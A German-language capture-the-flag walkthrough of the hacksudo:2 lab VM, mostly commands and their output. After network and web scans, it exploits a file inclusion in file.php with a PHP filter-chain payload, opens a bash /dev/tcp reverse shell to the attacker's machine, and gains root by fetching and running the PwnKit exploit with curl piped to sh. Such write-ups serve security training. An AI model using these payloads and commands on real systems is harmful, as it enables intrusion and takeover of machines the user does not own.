Zuerst wird mit arp-scan das Netzwerk gescannt, um die IP-Adresse des Ziels zu ermitteln.
ARP-Scan
192.168.2.129 08:00:27:40:d8:e9 PCS Systemtechnik GmbH
Als Nächstes wird die /etc/hosts-Datei bearbeitet, um den Hostnamen hacksudo2.vln der IP-Adresse zuzuordnen.
/etc/hosts
192.168.2.129 hacksudo2.vln
Nmap wird verwendet, um offene Ports und Dienste auf dem Zielsystem zu scannen. Die Option -Pn wird verwendet, um Host Discovery zu überspringen, falls ICMP blockiert ist.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-19 21:14 CEST
Nmap scan report for hacksudo2.vln (192.168.2.129)
Host is up (0.00023s latency).
Not shown: 65527 closed tcp ports (reset)
PRT STATE SERVICE VERSIN
80/tcp open http Apache httpd 2.4.46 ((Ubuntu))
|_http-server-header: Apache/2.4.46 (Ubuntu)
|_http-title: hacksudo:2
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 33228/udp6 mountd
| 100005 1,2,3 36509/tcp6 mountd
| 100005 1,2,3 38643/tcp mountd
| 100005 1,2,3 55198/udp mountd
| 100021 1,3,4 36535/tcp6 nlockmgr
| 100021 1,3,4 45622/udp nlockmgr
| 100021 1,3,4 46525/tcp nlockmgr
| 100021 1,3,4 52684/udp6 nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
1337/tcp open ssh penSSH 8.3p1 Ubuntu 1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 52:2e:98:98:b9:e9:c0:92:ed:ac:f8:8c:ee:3c:2e:dc (RSA)
| 256 6b:bb:8c:90:71:6a:f9:e8:2a:12:8f:0a:78:2b:26:7d (ECDSA)
|_ 256 13:68:45:ff:32:68:0c:e4:b5:1e:9b:ae:b6:33:f3:be (ED25519)
2049/tcp open nfs 3-4 (RPC #100003)
38643/tcp open mountd 1-3 (RPC #100005)
40493/tcp open mountd 1-3 (RPC #100005)
43879/tcp open mountd 1-3 (RPC #100005)
46525/tcp open nlockmgr 1-4 (RPC #100021)
MAC Address: 08:00:27:40:D8:E9 (racle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
S CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
S details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: S: Linux; CPE: cpe:/o:linux:linux_kernel
TRACERUTE
HP RTT ADDRESS
1 0.23 ms hacksudo2.vln (192.168.2.129)
Nikto wird verwendet, um den Webserver auf Schwachstellen zu scannen.
- Nikto v2.5.0
+ Target IP: 192.168.2.129
+ Target Hostname: 192.168.2.129
+ Target Port: 80
+ Start Time: 2024-09-19 21:15:31 (GMT2)
+ Server: Apache/2.4.46 (Ubuntu)
+ /: The anti-clickjacking X-Frame-ptions header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-ptions
+ /: The X-Content-Type-ptions header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /: Server may leak inodes via ETags, header found with file /, inode: 633, size: 5bda170f7dd76, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.46 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EL for the 2.x branch.
+ PTINS: Allowed HTTP Methods: GET, PST, PTINS, HEAD .
+ /web/: Directory indexing found.
+ /css/: Directory indexing found.
+ /css/: This might be interesting.
+ /lib/: Directory indexing found.
+ /lib/: This might be interesting.
+ /test.html: This might be interesting.
+ /web/: This might be interesting.
+ /info.php: utput from the phpinfo() function was found.
+ /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information. See: CWE-552
+ /info.php?file=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /README.md: Readme Found.
+ 8104 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time: 2024-09-19 21:15:43 (GMT2) (12 seconds)
+ 1 host(s) tested
Gobuster wird verwendet, um weitere Verzeichnisse und Dateien zu entdecken.
http://192.168.2.129/index.html (Status: 200) [Size: 1587]
http://192.168.2.129/info.php (Status: 200) [Size: 79829]
http://192.168.2.129/web (Status: 301) [Size: 312] [--> http://192.168.2.129/web/]
http://192.168.2.129/audio (Status: 301) [Size: 314] [--> http://192.168.2.129/audio/]
http://192.168.2.129/css (Status: 301) [Size: 312] [--> http://192.168.2.129/css/]
http://192.168.2.129/test.html (Status: 200) [Size: 3064]
http://192.168.2.129/game.html (Status: 200) [Size: 32472]
http://192.168.2.129/lib (Status: 301) [Size: 312] [--> http://192.168.2.129/lib/]
http://192.168.2.129/file.php (Status: 200) [Size: 238]
http://192.168.2.129/tiles (Status: 301) [Size: 314] [--> http://192.168.2.129/tiles/]
Progress: 13677696 / 13677758 (100.00%)
Durch die Analyse der file.php-Datei wurde eine File Inclusion-Schwachstelle entdeckt.
view-source:http://192.168.2.129/file.php
hacksudo file access hacksudo FILe access
href="https://hacksudo.com" hacksudo WEBSITE
------------------------------------------------------------------------------------
view-source:http://192.168.2.129/file.php?file=/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:101:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106:/:/usr/sbin/nologin
syslog:x:104:110:://usr/sbin/nologin
_apt:x:105:65534:/:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112:/:/usr/sbin/nologin
tcpdump:x:108:113:/:/usr/sbin/nologin
landscape:x:109:115:/:/usr/sbin/nologin
pollinate:x:110:1:/:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534:/:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
hacksudo:x:1000:1000:hacksudo:/home/hacksudo:/bin/bash
lxd:x:998:100:/:/bin/false
_rpc:x:113:65534:/:/usr/sbin/nologin
statd:x:114:65534/var/lib/nfs:/usr/sbin/nologin
root:x:0:0:root:/root:/bin/bash
hacksudo:x:1000:1000:hacksudo:/home/hacksudo:/bin/bash
PHP-Filter-Chain-Generator wird verwendet, um eine Reverse Shell zu erstellen.
[+] The following gadget chain will generate the following code : (base64 value: PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+)
php://filter/convert.iconv.UTF8.CSIS2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.base64-decode/resource=php://temp
Der generierte Payload wird verwendet, um den Befehl "id" auszuführen.
------------------------------------------------------------------------------------
http://192.168.2.129/file.php?file=php://filter/convert.iconv.UTF8.CSIS2022KR|convert.base64-
encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp&cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Netcat wird verwendet, um eine Reverse Shell zu empfangen.
listening on [any] 5555 ...
Der vollständige Reverse Shell-Befehl wird ausgeführt.
------------------------------------------------------------------------------------
view-source:http://192.168.2.129/file.php?file=php://filter/convert.iconv.UTF8.CSIS2022KR|convert.base64-encode
|convert.base64-decode/resource=php://temp&cmd=%2Fbin%2Fbash%20-c%20%27bash%20-i%20%3E%26%20%2F
dev%2Ftcp%2F192.168.2.199%2F5555%200%3E%261%27
------------------------------------------------------------------------------------
listening on [any] 5555 ...
connect to [192.168.2.199] from (UNKNWN) [192.168.2.129] 53558
bash: cannot set terminal process group (777): Inappropriate ioctl for device
bash: no job control in this shell
www-data@hacksudo:/var/www/html$
Eine Reverse Shell wurde erfolgreich erstellt.
www-data@hacksudo:/var/www/html$ stty rows 48 columns 94
www-data@hacksudo:/var/www/html$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@hacksudo:/var/www/html$
Es werden SUID-Dateien gesucht, um Möglichkeiten zur Privilegienerweiterung zu finden.
www-data@hacksudo:/var/www/html$ find / -type f -perm -4000 -ls 2>/dev/null
56 43 -rwsr-xr-x 1 root root 43088 Sep 16 2020 /snap/core18/2829/bin/mount
65 63 -rwsr-xr-x 1 root root 64424 Jun 28 2019 /snap/core18/2829/bin/ping
81 44 -rwsr-xr-x 1 root root 44664 Nov 29 2022 /snap/core18/2829/bin/su
99 27 -rwsr-xr-x 1 root root 26696 Sep 16 2020 /snap/core18/2829/bin/umount
1754 75 -rwsr-xr-x 1 root root 76496 Nov 29 2022 /snap/core18/2829/usr/bin/chfn
1756 44 -rwsr-xr-x 1 root root 44528 Nov 29 2022 /snap/core18/2829/usr/bin/chsh
1809 75 -rwsr-xr-x 1 root root 75824 Nov 29 2022 /snap/core18/2829/usr/bin/gpasswd
1873 40 -rwsr-xr-x 1 root root 40344 Nov 29 2022 /snap/core18/2829/usr/bin/newgrp
1886 59 -rwsr-xr-x 1 root root 59640 Nov 29 2022 /snap/core18/2829/usr/bin/passwd
886 44 -rwsr-xr-x 1 root root 44808 Feb 6 2024 /snap/core22/1612/usr/bin/chsh
952 71 -rwsr-xr-x 1 root root 72072 Feb 6 2024 /snap/core22/1612/usr/bin/gpasswd
1036 47 -rwsr-xr-x 1 root root 47488 Apr 9 15:32 /snap/core22/1612/usr/bin/mount
1045 40 -rwsr-xr-x 1 root root 40496 Feb 6 2024 /snap/core22/1612/usr/bin/newgrp
1060 59 -rwsr-xr-x 1 root root 59976 Feb 6 2024 /snap/core22/1612/usr/bin/passwd
1178 55 -rwsr-xr-x 1 root root 55680 Apr 9 15:32 /snap/core22/1612/usr/bin/su
1179 227 -rwsr-xr-x 1 root root 232416 Apr 3 2023 /snap/core22/1612/usr/bin/sudo
1239 35 -rwsr-xr-x 1 root root 35200 Apr 9 15:32 /snap/core22/1612/usr/bin/umount
1331 35 -rwsr-xr-- 1 root systemd-network 35112 ct 25 2022 /snap/core22/1612/usr/lib/dbus-1.0/dbus-daemon-launch-helper
2600 331 -rwsr-xr-x 1 root root 338536 Jun 26 13:11 /snap/core22/1612/usr/lib/openssh/ssh-keysign
8626 19 -rwsr-xr-x 1 root root 18736 Feb 26 2022 /snap/core22/1612/usr/libexec/polkit-agent-helper-1
293 133 -rwsr-xr-x 1 root root 135960 Apr 24 16:45 /snap/snapd/21759/usr/lib/snapd/snap-confine
---------------------------------------------------------------------------------------------------------------------------------------
7496 24 -rwsr-xr-x 1 root root 22840 Aug 3 2020 /usr/libexec/polkit-agent-helper-1
---------------------------------------------------------------------------------------------------------------------------------------
4308 120 -rwsr-xr-x 1 root root 121688 Sep 16 2020 /usr/sbin/mount.nfs
829 44 -rwsr-xr-x 1 root root 44784 May 28 2020 /usr/bin/newgrp
1088 72 -rwsr-xr-x 1 root root 72072 Aug 30 2020 /usr/bin/su
553 84 -rwsr-xr-x 1 root root 85064 May 28 2020 /usr/bin/chfn
------------------------------------------------------------------------------------------------
883 32 -rwsr-xr-x 1 root root 31032 Aug 3 2020 /usr/bin/pkexec
------------------------------------------------------------------------------------------------
261 180 -rwsr-xr-x 1 root root 182472 Jan 19 2021 /usr/bin/sudo
456 56 -rwsr-sr-x 1 daemon daemon 55712 Jul 10 2020 /usr/bin/at
664 40 -rwsr-xr-x 1 root root 39144 Mar 7 2020 /usr/bin/fusermount
862 68 -rwsr-xr-x 1 root root 68208 May 28 2020 /usr/bin/passwd
559 52 -rwsr-xr-x 1 root root 53040 May 28 2020 /usr/bin/chsh
815 56 -rwsr-xr-x 1 root root 55680 Aug 30 2020 /usr/bin/mount
1158 40 -rwsr-xr-x 1 root root 39296 Aug 30 2020 /usr/bin/umount
682 88 -rwsr-xr-x 1 root root 88464 May 28 2020 /usr/bin/gpasswd
315 476 -rwsr-xr-x 1 root root
1613 132 -rwsr-xr-x 1 root root 133960 Feb 2 2021 /usr/lib/snapd/snap-confine
1365 52 -rwsr-xr-- 1 root messagebus 51496 Sep 10 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
Die Version von pkexec wird überprüft.
Referenz: https://github.com/ly4k/PwnKit
www-data@hacksudo:/var/www/html$ pkexec --version
pkexec version 0.105
Der Exploit PwnKit (CVE-2021-4034) wird verwendet, um Root-Rechte zu erlangen.
www-data@hacksudo:/var/www/html$ cd /tmp/
www-data@hacksudo:/tmp$ sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"
root@hacksudo:/tmp# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
Die Root-Shell wurde erfolgreich erhalten.
root@hacksudo:/tmp# cd /root/
root@hacksudo: ls
root.txt snap
root@hacksudo: cat root.txt
rooted!!!
| |__ __ _ ___| | _____ _ _ __| | ___ ___ ___ _ __ ___
| '_ \ / _` |/ __| |/ / __| | | |/ _` |/ _ \ / __/ _ \| '_ ` _ \
| | | | (_| | (__| <\__ \ |_| | (_| | (_) | _ | (_| (_) | | | | | |
|_| |_|\__,_|\___|_|\_\___/\__,_|\__,_|\___/ (_) \___\___/|_| |_| |_|
www.hacksudo.com
Die User-Flagge wird angezeigt.
root@hacksudo: cat /home/hacksudo/.
./ .bash_logout .profile
../ .bashrc .sudo_as_admin_successful
.bash_history .cache/
root@hacksudo: cat /home/hacksudo/.
./ .bash_logout .profile
../ .bashrc .sudo_as_admin_successful
.bash_history .cache/
root@hacksudo: find / -name user.txt 2>/dev/null
root@hacksudo:
Privilege Escalation erfolgreich
rooted!!! | |__ __ _ ___| | _____ _ _ __| | ___ ___ ___ _ __ ___ | '_ \ / _` |/ __| |/ / __| | | |/ _` |/ _ \ / __/ _ \| '_ ` _ \ | | | | (_| | (__| <\__ \ |_| | (_| | (_) | _ | (_| (_) | | | | | | |_| |_|\__,_|\___|_|\_\___/\__,_|\__,_|\___/ (_) \___\___/|_| |_| |_| www.hacksudo.com